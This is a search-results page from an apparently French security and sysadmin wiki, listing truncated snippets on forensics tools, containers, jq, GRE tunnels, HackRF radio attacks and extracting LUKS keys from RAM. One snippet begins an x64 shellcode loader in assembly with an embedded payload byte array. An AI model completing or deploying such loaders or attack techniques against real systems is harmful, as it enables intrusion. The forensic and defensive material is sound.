Search Results

Introduction Cette page présente une méthode pour obtenir une clé de récupération d'une partition chiffrée LUKS (systèmes Linux) à partir de la RAM. Manuel Tout d'abord utilisez aeskeyfind pour extraire toutes les clés AES 128 et 256 de l'image de la ram : ...

Introduction Le logiciel NetworkMiner est disponible sur Windows et Linux pour analyser les fichiers PCAP. Il permet notamment d'afficher des informations comme les fichiers échangés, les secrets ou autre à travers des sous-menus. Installation Debian sud...

Introduction L'outil en ligne A-Packets permet d'analyser des fichiers PCAP de moins de 25Mo. La navigation pour trouver des indicateurs de compromission est très pratique et peut faire gagner énormément de temps pour une investigation contrairement à des out...

Introduction Incus est un gestionnaire de conteneur LXC et de machines virtuelles. Il est très rapide et s'accompagne d'une interface graphique qui aide grandement à la gestion des instances. Manuel Créer un pool de stockage BTRFS incus storage create po...

Introduction Cette commande permet de parser du json et d'afficher le résultat en couleur ce qui est très pratique pour l'analyse. Manuel Utilisation basique cat myfile.json | jq Chercher un champ spécifique jq '.[] | select(.<FIELD> | test("<VALUE>"; "i...

Introduction Ce boitier permet d'effectuer diverses attaques sur les ondes radios. Manuel Firmwares Téléchargez les firmwares .bin à cette adresse : https://github.com/greatscottgadgets/hackrf/releases/ Puis balancez le firmware sur l'équipement ap...

Shellcode loader x64 bits extrn VirtualAlloc :PROC extrn GetCurrentProcess :PROC extrn WriteProcessMemory :PROC .data shellcode DB 48h,31h,0c9h,48h,81h,0e9h,0feh,0ffh,0ffh,0ffh,48h,8dh,05h DB 0efh,0ffh,0ffh,0ffh,48h,0bbh,7dh,5dh,14h,08h,0adh,4...

Introduction Cet outil permet de travailler avec les fichiers CSV en ligne de commande. En plus il est développé en Rust ce qui le rend beaucoup plus performant qu'un excel, ou libre office. Manuel Documentations La doc est vraiment complète : https:/...

Introduction Les tunnels GRE permettent de faire une sorte de VPN site à site pour faire communiquer deux réseaux distants grâce à un tunnel. Installation Sur le routeur de Paris : int tun0 tunnel source 1.1.1.1 tunnel destination 2.2.2.2 ip add 1...